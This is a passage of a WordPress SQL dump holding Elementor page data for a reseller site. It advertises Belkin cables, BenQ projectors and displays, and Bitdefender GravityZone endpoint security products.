core<\\/h3>\\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\\n<h3>Global leader in tech.<\\/h3>\\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\\n<h3>Always looking to the future<\\/h3>\\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.\\n<h3>Unmatched performance, every time<\\/h3>\\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\\n<h3>We believe good design matters.<\\/h3>\\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>&nbsp;\\n<h3>Product\\u00a0 : -<\\/h3>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>\\u00a0<\\/strong>\\n\\n<strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong>\\n\\n&nbsp;\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/>\\n\\n<strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Mini DisplayPortTM to VGA<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Micro HDMI Adapter<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Lightning Audio + Charge RockStar\\u2122<\\/strong>\\n\\n&nbsp;\\n\\n&nbsp;\\n\\n<center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6723,3274,'_elementor_version','2.5.14'),(8683,3668,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:6;s:16:\"content_position\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:13:\"content_width\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:3;}}}}}'),(6733,3276,'_wp_page_template','template-fullwidth.php'),(6734,3276,'_elementor_edit_mode','builder'),(6735,3276,'_elementor_template_type','post'),(6736,3276,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4>&nbsp;<\\/h4>\\n<h3>Innovation, with quality at its core<\\/h3>\\n<p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p>\\n<h3>Global leader in tech.<\\/h3>\\n<p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p>\\n<h3>Always looking to the future<\\/h3>\\n<p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p>\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\n<p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p>\\n<h3>Unmatched performance, every time<\\/h3>\\n<p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p>\\n<h3>We believe good design matters.<\\/h3>\\n<p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p><\\/p>\\n<p><\\/p>\\n<h3>Product&nbsp; : -<\\/h3>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong style=\\\"background-color: transparent; font-size: 0.875rem;\\\">3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><br><\\/p><center><\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\"><\\/p>\\n<p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p>\\n<p><\\/p><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p>\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Micro HDMI Adapter<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6737,3276,'_elementor_version','2.5.14'),(6750,3278,'_elementor_version','0.4'),(6748,3278,'_wp_page_template','template-fullwidth.php'),(6761,3280,'_elementor_template_type','post'),(6747,3278,'_elementor_template_type','post'),(6751,3278,'_elementor_edit_mode','builder'),(6754,3279,'_elementor_template_type','post'),(6755,3279,'_wp_page_template','template-fullwidth.php'),(6756,3279,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Projectors<\\/h1><h3>\\u00a0<\\/h3><h2>Business Projector (Smart Design for Presentations)<\\/h2><h3>High Brightness for Well-Lit Rooms<\\/h3><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><p>\\u00a0<\\/p><h2>Interactive Classroom Projectors<\\/h2><h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h3><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3>\\u00a0<\\/h3><h1>Interactive Flat Panel<\\/h1><h4>\\u00a0<\\/h4><h2>Meeting Room &amp; Boardroom<\\/h2><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><p>\\u00a0<\\/p><h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h3><h5>Work Collaboratively and Conduct Business Efficiently<\\/h5><p>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>\\u00a0<\\/h4><h5>How BenQ Display turns meeting rooms into places of efficiency<\\/h5><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>\\u00a0<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6757,3279,'_elementor_version','2.5.14'),(6758,3279,'_elementor_edit_mode','builder'),(6762,3280,'_wp_page_template','template-fullwidth.php'),(6763,3280,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Projectors<\\/h1><h3>\\u00a0<\\/h3><h2>Business Projector (Smart Design for Presentations)<\\/h2><h3>High Brightness for Well-Lit Rooms<\\/h3><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.<\\/p><p>\\u00a0<\\/p><h2>Interactive Classroom Projectors<\\/h2><h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h3><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.<\\/p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li><li>High Brightness from 3000-3500 ANSI Lumens<\\/li><li>High resolution with (Ultra) Short Throw<\\/li><li>Scalable for Wireless Use and Interactivity<\\/li><\\/ul><h3>\\u00a0<\\/h3><h2>Interactive Flat Panel<\\/h2><h3>Meeting Room &amp; Boardroom<\\/h3><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.<\\/p><p>\\u00a0<\\/p><h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h3><h5>Work Collaboratively and Conduct Business Efficiently<\\/h5><p>The RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.<\\/p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.<\\/p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.<\\/p><h4>\\u00a0<\\/h4><h5>How BenQ Display turns meeting rooms into places of efficiency<\\/h5><ul><li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li><li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li><li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li><\\/ul><p>\\u00a0<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6764,3280,'_elementor_version','2.5.14'),(6765,3280,'_elementor_edit_mode','builder'),(6768,3281,'_wp_page_template','template-fullwidth.php'),(6769,3281,'_elementor_edit_mode','builder'),(6770,3281,'_elementor_template_type','post'),(6771,3281,'_elementor_data','[{\"id\":\"f45ae99\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8e3ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d4b58a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR<\\/h2><h3>It\\u2019s Time to Rethink Endpoint Security<br \\/>Protect Endpoints<\\/h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. It\\u2019s time to rethink endpoint security! <br \\/>Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d48298\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92610b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"511bcd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Product\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1968e47\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5621671\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2b3de2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2d90c4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c385b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Ultra Suite\\u00a0<\\/strong><\\/h3><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0df7a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e3ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Enterprise Security<\\/strong><\\/h3><p>Bitdefender\\u2019s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d71c81\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8156e62\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a9e1d2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\">Protect all devices<\\/h2><h3>Anti Ransomware<\\/h3><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes \\u2013 so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.<\\/p><h3 id=\\\"products\\\" class=\\\"title-products\\\">Products<\\/h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"252c7e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8230f0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b52c9d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6d7174f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb8152b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Security for 